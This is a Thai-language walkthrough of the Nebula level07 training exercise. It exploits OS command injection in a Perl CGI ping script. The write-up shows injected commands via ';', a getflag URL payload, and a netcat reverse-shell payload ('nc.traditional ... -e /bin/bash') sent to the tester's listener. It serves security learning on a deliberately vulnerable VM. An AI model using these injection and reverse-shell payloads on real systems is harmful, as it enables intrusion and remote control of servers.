How to inject the OS command through CGI – Nebula 07

บทนำ (Overview)

บทความนี้กล่าวถึงการยกระดับสิทธิโดยใช้ “CGI” ผ่าน เว็บบราวเซอร์ โดยโปรแกรมนั้นมีช่องโหว่ของ “OS command injection” หรือสามารถเรียกใช้งานคำสั่งของระบบปฏิบัติการได้ โดยบทความนำเสนอวิธีการสร้าง “Reverse shell” ผ่านช่องโหว่ดังกล่าวเพื่อเชื่อมต่อโปรแกรม NC ที่เราตั้งรอเอาไว้ดังนี้

ขั้นตอน (Steps)

 1. ดาวน์โหลด “VM” ได้จาก https://exploit-exercises.com/download/
 2. “Login” โดยใช้ “User” คือ “level07” และ “Password” คือ “level07”
 3. โดยวัตถุประสงค์เราจะยกระดับสิทธิจาก “level07” เป็น “flag07”
 4. ทดลองตรวจสอบไฟล์ในโฟลเดอร์
  level07@nebula:/home/flag07$ ls -l
  total 5
  -rwxr-xr-x 1 root root 368 2011-11-20 21:22 index.cgi
  -rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf
  
 5. จากข้างต้นเราพบ “2” ไฟล์ทดลองค่อยเปิดดูที่ละไฟล์ดังนี้
  level07@nebula:/home/flag07$ cat index.cgi
  #!/usr/bin/perl
  
  use CGI qw{param};
  
  print "Content-type: text/html\n\n";
  
  sub ping {
  	$host = $_[0];
  
  	print("<html><head><title>Ping results</title></head><body>
  
  <pre>");
  
  	@output = `ping -c 3 $host 2>&1`;
  	foreach $line (@output) { print "$line"; } 
  
  	print("</pre>
  
  </body></html>");
  }
  
  # check if Host set. if not, display normal page, etc
  
  ping(param("Host"));
  
  1. โปรแกรมรับค่าอาร์กิวเมนจากภายนอก ที่ชื่อ “Host” จากนั้นจะเรียก “Procedure” ชื่อ “ping” จากนั้นนำไปเก็บไว้ที่ตัวแปร “$host”
   ping(param("Host"));
   $host = $_[0];
   
  2. จากนั้นนำไปประมวลผลคำสั่ง “OS” ซึ่งก็คือคำสั่ง “Ping” ดังนั้นเราพอสรุปได้ว่าโปรแกรมดังกล่าวคือโปรแกรมสำหรับ “Ping” นั้นเอง
   @output = `ping -c 3 $host 2>&1`;
   
  3. ทดลองใช้งานคำสั่งโปรแกรมข้างต้นได้ดังนี้
   ./index.cgi Host=127.0.0.1
   
  4. ที่นี้ลองเปลี่ยนคำสั่งเล็กหน่อย โดยใช้ “;” คั่นระหว่างคำสั่งเก่ากับใหม่ จะพบว่าเราสามารถแทรกคำสั่งที่เราต้องการลงไปได้
   ./index.cgi Host=;ls -asl
   

  5. แต่อย่างไรก็ตามเราก็ยังไม่สามารถได้สิทธิของ “Flag07” ได้
 6. จากนั้นตรวจสอบไฟล์ที่สอง
  level07@nebula:/home/flag07$ cat thttpd.conf
  # /etc/thttpd/thttpd.conf: thttpd configuration file
  
  # This file is for thttpd processes created by /etc/init.d/thttpd.
  # Commentary is based closely on the thttpd(8) 2.25b manpage, by Jef Poskanzer.
  
  # Specifies an alternate port number to listen on.
  port=7007
  
  # Specifies a directory to chdir() to at startup. This is merely a convenience -
  # you could just as easily do a cd in the shell script that invokes the program.
  dir=/home/flag07
  
  # Do a chroot() at initialization time, restricting file access to the program's
  # current directory. If chroot is the compiled-in default (not the case on
  # Debian), then nochroot disables it. See thttpd(8) for details.
  nochroot
  #chroot
  
  # Specifies a directory to chdir() to after chrooting. If you're not chrooting,
  # you might as well do a single chdir() with the dir option. If you are
  # chrooting, this lets you put the web files in a subdirectory of the chroot
  # tree, instead of in the top level mixed in with the chroot files.
  #data_dir=
  
  # Don't do explicit symbolic link checking. Normally, thttpd explicitly expands
  # any symbolic links in filenames, to check that the resulting path stays within
  # the original document tree. If you want to turn off this check and save some
  # CPU time, you can use the nosymlinks option, however this is not
  # recommended. Note, though, that if you are using the chroot option, the
  # symlink checking is unnecessary and is turned off, so the safe way to save
  # those CPU cycles is to use chroot.
  #symlinks
  #nosymlinks
  
  # Do el-cheapo virtual hosting. If vhost is the compiled-in default (not the
  # case on Debian), then novhost disables it. See thttpd(8) for details.
  #vhost
  #novhost
  
  # Use a global passwd file. This means that every file in the entire document
  # tree is protected by the single .htpasswd file at the top of the tree.
  # Otherwise the semantics of the .htpasswd file are the same. If this option is
  # set but there is no .htpasswd file in the top-level directory, then thttpd
  # proceeds as if the option was not set - first looking for a local .htpasswd
  # file, and if that doesn't exist either then serving the file without any
  # password. If globalpasswd is the compiled-in default (not the case on Debian),
  # then noglobalpasswd disables it.
  #globalpasswd
  #noglobalpasswd
  
  # Specifies what user to switch to after initialization when started as root.
  user=flag07
  
  # Specifies a wildcard pattern for CGI programs, for instance "**.cgi" or
  # "/cgi-bin/*". See thttpd(8) for details.
  cgipat=**.cgi
  
  # Specifies a file of throttle settings. See thttpd(8) for details.
  #throttles=/etc/thttpd/throttle.conf
  
  # Specifies a hostname to bind to, for multihoming. The default is to bind to
  # all hostnames supported on the local machine. See thttpd(8) for details.
  #host=
  
  # Specifies a file for logging. If no logfile option is specified, thttpd logs
  # via syslog(). If logfile=/dev/null is specified, thttpd doesn't log at all.
  #logfile=/var/log/thttpd.log
  
  # Specifies a file to write the process-id to. If no file is specified, no
  # process-id is written. You can use this file to send signals to thttpd. See
  # thttpd(8) for details.
  #pidfile=
  
  # Specifies the character set to use with text MIME types.
  #charset=iso-8859-1
  
  # Specifies a P3P server privacy header to be returned with all responses. See
  # http://www.w3.org/P3P/ for details. Thttpd doesn't do anything at all with the
  # string except put it in the P3P: response header.
  #p3p=
  
  # Specifies the number of seconds to be used in a "Cache-Control: max-age"
  # header to be returned with all responses. An equivalent "Expires" header is
  # also generated. The default is no Cache-Control or Expires headers, which is
  # just fine for most sites.
  #max_age=
  
  
  1. ไฟล์ดังกล่าวเป็นไฟล์ “config” สำหรับ “web server” โดยเมื่อตรวจสอบพบว่ามีการตั้งค่า “port” ไว้ดังนี้
   port=7007
   
  2. ให้ทดลองดูว่า “OS” เปิด “port” ดังกล่าวไว้หรือไม่
   netstat -ant
   Active Internet connections (servers and established)
   Proto Recv-Q Send-Q Local Address      Foreign Address     State   
   tcp    0   0 127.0.0.1:50001     0.0.0.0:*        LISTEN   
   tcp    0   0 0.0.0.0:22       0.0.0.0:*        LISTEN   
   tcp    0   0 0.0.0.0:10007      0.0.0.0:*        LISTEN   
   tcp    0  288 192.168.1.54:22     192.168.1.61:53094   ESTABLISHED
   tcp6    0   0 :::1616         :::*          LISTEN   
   tcp6    0   0 :::22          :::*          LISTEN   
   tcp6    0   0 :::7007         :::*          LISTEN 
   
 7. จากผลลัพธ์ข้างต้นพบ “port”  หมายเลข “7007” ถ้าไม่พบให้ “shutdown” และเปิด “VM” ขึ้นมาใหม่อีกครั้ง
  #%3B คือ ;
  http://192.168.1.54:7007/index.cgi?Host=%3Bgetflag
  
 8. ลองย้อนกลับไปดูไฟล์ “config” พบว่า บัญชีผู้ใช้ “flag07” จะถูกนำมาใช้งานบริการเว็บ (web server) เพราะฉะนั้นสิทธิที่เราจะได้คือของบัญชี “flag07” นั้นเอง
  # Specifies what user to switch to after initialization when started as root.
  user=flag07
  

 9. ทดลองสร้าง “reverse shell” ดังนี้
  #nc.traditional -nv 192.168.1.61 4444 -e /bin/bash
  http://192.168.1.54:7007/index.cgi?Host=%3Bnc.traditional%20-nv%20192.168.1.61%204444%20-e%20/bin/bash
  

ใส่ความเห็น